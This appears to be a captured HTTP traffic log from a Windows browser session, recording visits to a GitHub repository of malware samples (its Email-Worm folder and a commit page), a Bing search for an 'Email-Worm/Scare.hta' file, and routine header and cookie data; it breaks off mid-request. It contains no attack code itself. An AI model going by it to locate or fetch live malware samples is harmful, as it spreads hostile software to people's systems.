cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:36:40 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"3d92cbe01b7c97b88a6bfdab1c1e0551"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
x-html-safe: 551b05c23e87c25fdef8ecb9d40da50bde042bdda1be77488139e3bdfe555a1d
x-github-request-id: 10C5:21C830:62454:7FF21:67D0F330
GET

https://github.com/Da2dalus/The-MALWARE-Repo/branch_commits/aca60d9e92246e1c13242054f907baaac913c311

msedge.exe

Remote address:

20.26.156.215:443

Request

GET /Da2dalus/The-MALWARE-Repo/branch_commits/aca60d9e92246e1c13242054f907baaac913c311 HTTP/2.0
host: github.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: text/html
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:36:41 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
etag: W/"e984e22102cb835e1bc41a5edd173600"
cache-control: max-age=0, private, must-revalidate
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
content-encoding: gzip
accept-ranges: bytes
x-html-safe: 551b05c23e87c25fdef8ecb9d40da50bde042bdda1be77488139e3bdfe555a1d
content-length: 392
x-github-request-id: 10C5:21C830:62493:7FF6F:67D0F338
POST

https://github.com/commits/badges

msedge.exe

Remote address:

20.26.156.215:443

Request

POST /commits/badges HTTP/2.0
host: github.com
content-length: 564
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
accept: application/json
dnt: 1
x-requested-with: XMLHttpRequest
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: multipart/form-data; boundary=----WebKitFormBoundaryDyTv65GgdIVGvHuW
origin: https://github.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=I9uWEVCHph2vcISqBHQYdsezX0gJMDNAFBlatpKvz7NwaIObIclGWy%2B5IVr49h5zYT38A5dRRjQuAV9aTISZSUnW%2BZHf5W8pux645WJzcoDrQSmIvF0dRe250QSYLzZ40Y64jdHGhm0HsbjQGtoCuMmSBPsrq10EGY6sZcmt7ADBfFyP0E70TyxCZ06KHuwDaT%2F6EKxHKmzZwOegCyZBXOVgP4emHKdfNWC9VN9JIkqyhvfX5E0u1BeIDkQS%2BfuT2LV0NzdkVTk9HslvJivSXw%3D%3D--2QpIhbSI4Le9mykj--LO%2Bx4UFCiZPL4SeRCbTmqQ%3D%3D
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

server: GitHub.com
date: Wed, 12 Mar 2025 02:36:41 GMT
content-type: application/json; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame
etag: W/"180fd121b3fcd3bd5c776bf176af1aec"
cache-control: max-age=0, private, must-revalidate
set-cookie: _gh_sess=gtHxjhu%2B%2BJ42frvof%2F0GbptBWOV4V2ohsZuHZBNdrvxWsxWyOAg74TIbZ0ihcw1YC3jVYg74xcVg89We1GCvxSW6xg1GJpmcngzlULOnbmJQ9AHfmOQeNA1PrpMe9Y%2FGXPcB%2FFATOWeq9NMMO5t%2Fy2sB6J4oQ5PlArSVK%2FgHKhf6PzuM%2BMG9WXav5wNhUiaAJ7dq8niBQ%2F78CbLCyOYghpv9GazwzIs9MJNQXDEgB73uUliupcZPj799yZpRmo7hqey8WNN748JSsLTFS%2B6ArA%3D%3D--NxW%2Fc7dA1kBp2FXk--sXk1keOrpbL6nHt%2BIATqig%3D%3D; path=/; secure; HttpOnly; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
vary: Accept-Encoding, Accept, X-Requested-With
content-encoding: gzip
x-github-request-id: 10C5:21C830:62496:7FF7A:67D0F339
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 1442
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commits/master/Email-Worm
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Wed, 12 Mar 2025 02:36:32 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1741750592
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: 2434:349D0F:3997A:4F169:67D0F330
POST

https://api.github.com/_private/browser/stats

msedge.exe

Remote address:

20.26.156.210:443

Request

POST /_private/browser/stats HTTP/2.0
host: api.github.com
content-length: 232
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://github.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://github.com/Da2dalus/The-MALWARE-Repo/commit/aca60d9e92246e1c13242054f907baaac913c311
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _octo=GH1.1.926262901.1741746904
cookie: logged_in=no
cookie: cpu_bucket=lg
cookie: preferred_color_mode=light
cookie: tz=UTC

Response

HTTP/2.0 200

date: Wed, 12 Mar 2025 02:36:46 GMT
content-type: text/plain
content-length: 0
cache-control: no-cache
x-ratelimit-limit: 60
x-ratelimit-remaining: 60
x-ratelimit-reset: 1741750606
x-ratelimit-used: 0
x-ratelimit-resource: core
x-github-media-type: github.v3; format=json
x-github-api-version-selected: 2022-11-28
access-control-expose-headers: ETag, Link, Location, Retry-After, X-GitHub-OTP, X-RateLimit-Limit, X-RateLimit-Remaining, X-RateLimit-Used, X-RateLimit-Resource, X-RateLimit-Reset, X-OAuth-Scopes, X-Accepted-OAuth-Scopes, X-Poll-Interval, X-GitHub-Media-Type, X-GitHub-SSO, X-GitHub-Request-Id, Deprecation, Sunset
access-control-allow-origin: *
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: origin-when-cross-origin, strict-origin-when-cross-origin
content-security-policy: default-src 'none'
vary: Accept-Encoding, Accept, X-Requested-With
server: github.com
x-github-request-id: 2434:349D0F:39C9D:4F5F2:67D0F330
GET

https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
sec-ch-ua-mobile: ?0
dnt: 1
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/html; charset=utf-8
cache-control: private, max-age=0
content-encoding: br
expires: Wed, 12 Mar 2025 02:36:02 GMT
vary: Accept-Encoding
x-eventid: 67d0f34ebdd34e04a70a09db64ac7e27
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
strict-transport-security: max-age=31536000; includeSubDomains; preload
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Egq8+Ft8aVzezB4mFY76K8WpUz1jfqftdzOVVUnz1OU='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp&ndcParam=QWthbWFp"}]}
report-to: {"group":"crossorigin-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingserp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.01,"failure_fraction":1.0,"include_subdomains":true}
cross-origin-embedder-policy-report-only: 'require-corp; report-to=\"crossorigin-errors\"'
cross-origin-opener-policy-report-only: 'same-origin; report-to=\"crossorigin-errors\"'
date: Wed, 12 Mar 2025 02:37:02 GMT
set-cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:02 GMT; path=/; secure; SameSite=None
set-cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E; expires=Mon, 06-Apr-2026 02:37:02 GMT; path=/; HttpOnly
set-cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7; domain=.bing.com; path=/; HttpOnly
set-cookie: _EDGE_V=1; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:02 GMT; path=/; HttpOnly
set-cookie: USRLOC=HS=1; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:02 GMT; path=/; secure; HttpOnly; SameSite=None
set-cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHS=PC=U531; domain=.bing.com; path=/; secure; SameSite=None
set-cookie: SRCHD=AF=ANAB01; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:02 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:02 GMT; path=/; secure; SameSite=None
set-cookie: SRCHUSR=DOB=20250312; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:02 GMT; path=/; secure; SameSite=None
set-cookie: SRCHHPGUSR=SRCHLANG=en; domain=.bing.com; expires=Mon, 06-Apr-2026 02:37:02 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747022.32df0f9
set-cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK; Domain=.bing.com; Path=/; Expires=Wed, 12 Mar 2025 04:37:02 GMT; Max-Age=7200
GET

https://www.bing.com/sa/simg/Roboto_Regular.woff2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /sa/simg/Roboto_Regular.woff2 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
dnt: 1
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://www.bing.com/search?q=Email-Worm%2FScare.hta&aqs=edge..69i57j69i58.240747624j0j0&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: MUIDB=151CAB4AF5806A13125EBEE7F4A86B5E
cookie: _EDGE_S=F=1&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: _EDGE_V=1
cookie: USRLOC=HS=1
cookie: _SS=PC=U531&SID=24C008279C1E694D33C41D8A9D3668C7
cookie: SRCHS=PC=U531
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=575A309FEDF94F12B0494DBAB9C5DE96&dmnchg=1
cookie: SRCHUSR=DOB=20250312
cookie: SRCHHPGUSR=SRCHLANG=en
cookie: ak_bmsc=460F9CF86D91FE2797181D5F9BF82436~000000000000000000000000000000~YAAQ149lX3EKJoaVAQAA7Go2iBusobvMjCt1a91fQugVp/azdtYg1cTblOvURERa6llqS9JxqWcm3ouWwSFcZ8Bne5/giyec+AvEw7Eyrkh4FcOwG9mWFJNwafhEcf5Re6ZI03jpRsnzMmSI/EbvFW/edFHoN7a12fHuhKsbnm23TBwnYfd0/7qRY65rp2M5zDdp/uRRnOJX72sLce+UT1VECXNCf9pgaxEFjNAFRlw8CrLGwWGoTo2sQwtnqGM8VahMHAuGonHuvBCenFF6eIqs++ZxS5YN+XMKXqTOaH/uT58z5M0FC40qfKOCwXX8SXHM76RAnKPqfw0gOtCDf5Dwhgp03XCOJf/PI0iHxHVbShJZyBVvwdrDtPQ39zX/uNraQHTVuARK

Response

HTTP/2.0 200

content-length: 15344
content-type: font/woff2
cache-control: public, max-age=15552000
last-modified: Mon, 01 Jan 1601 00:00:00 GMT
x-eventid: 67601b514a794596bc0f51e79662f334
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-pElm+CU2k4Hr8Nj0miteYMzb1sRx81JgBMxb62ONWG8='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
date: Wed, 12 Mar 2025 02:37:02 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.d78f655f.1741747022.32df153
GET

https://www.bing.com/sa/simg/Roboto_Semibold.woff2

msedge.exe

Remote address:

88.221.135.33:443

Request

GET /sa/simg/Roboto_Semibold.woff2 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://www.bing.com
sec-ch-ua-mobile: ?0
